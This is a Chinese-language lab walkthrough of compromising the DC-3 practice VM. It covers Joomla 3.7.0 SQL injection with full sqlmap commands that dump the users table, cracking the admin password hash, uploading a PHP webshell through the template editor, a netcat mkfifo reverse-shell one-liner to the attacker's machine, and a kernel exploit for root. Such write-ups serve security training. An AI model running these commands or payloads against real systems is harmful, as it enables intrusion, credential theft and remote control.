DC-3靶機滲透
和前兩個靶機不同的是DC-3不需要找五個flag,這裏只需要直接找到後臺拿shell提權到root權限,所以沒有太多線索,就是一個字,幹!!
直接nmap掃描網段ip,開放端口,這裏DC-3的IP是192.168.11.136
開放的端口是80,我們進入網站看看
首先他是一個登錄界面,可以嘗試爆破,但是還是先看一下有沒有別的有用信息,瀏覽了一下界面沒有什麼可以利用到的界面;
其次可以用火狐插件查看網站的一些相關信息,這裏CMS是joomla(也可以用whatweb網站識別工具),想到joomla網站掃描工具,好的出現第二個思路了;
最後來繼續搜尋有用信息,看一下robots.txt和README.txt,果然README.txt可以看到CMS版本是3.x;
繼續掃一下目錄發現後臺登錄的目錄以及一些打開空白的頁面先這樣留着
信息蒐集到此結束;
我們試一下用工具joomscan掃一下網站有沒有什麼線索,發現:
一個是登錄頁面,一個是暴了版本信息,但是我們之前都已經查到了(所以是不是不用這個工具也罷,但是這個工具倒是挺省事兒)
後來我又發現好像有個注入點,不輸入參數的時候把users這個表給暴出來了,但是一些比較特殊的字符都給過濾了,sqlmap也跑不出來我就放棄了
但是現在搜了一些joomla3.7.0,果然有個注入漏洞,我們打開42033.txt看看去
這裏用sqlmap跑一下就完事兒
sqlmap -u "http://192.168.11.136/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] --batch
sqlmap -u "http://192.168.11.136/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] --batch -D joomladb --tables
sqlmap -u "http://192.168.11.136/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] --batch -D joomladb -T users --columns
sqlmap -u "http://192.168.11.136/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] --batch -D joomladb -T users -C "name,password" --dump
最後得到用戶名admin和密碼snoopy,需要注意的是密碼是經過加密的,用john爆破hash密碼就歐克!
這樣我們等到賬戶用戶名了登入網站後臺查找有用信息,這裏一般肯定會有信息然後讓你拿到webshell的畢竟前面的工作也做了不少;
之後會發現templates的頁面,可以上傳PHP文件,而且template是不是感覺很熟悉,剛剛掃目錄掃出來過,我們先試一下能不能上傳一句話木馬
然後去訪問html下的222.php文件可以訪問!!!然後用菜刀???不!!!
這裏用菜刀是連不上的因爲操作系統的問題,我花了好久最後才知道應該要用蟻劍才能連接上;
www-data用戶,主機Ubuntu 16.04 內核 4.4.0-21,我們反彈shell到kali虛擬機:
kali先監聽7777端口:nc -lnvp 7777
然後在蟻劍上輸入:rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.11.129 7777 >/tmp/f
網上有許多shell反彈姿勢,我也是借鑑網上的;
然後試了一般的提權姿勢好像不可取,看一下內核版本可能是要通過內核提權
searchsploit ubantu 16.04
發現有不少可利用的漏洞,選一個打開txt文件看一下相關說明,然後就會發現
然後下載上傳exploit.tar在shell界面解壓編譯exp就會獲得root權限;
查看flag會提示welldone!!不多說了趕緊寫個總結去看網課!!
總結:DC系列靶機前三個都和常和PHP搭配的三個CMS扯上了關係(drupal、joomla、wordpress),而且通過CMS也可以進一步找到突破口從而拿到webshell,然後就是一個反彈shell常用姿勢以及提取常用姿勢的熟悉,DC靶機系列刷完了再做一個系統性的總結!還有就是希望疫情趕緊過去!!!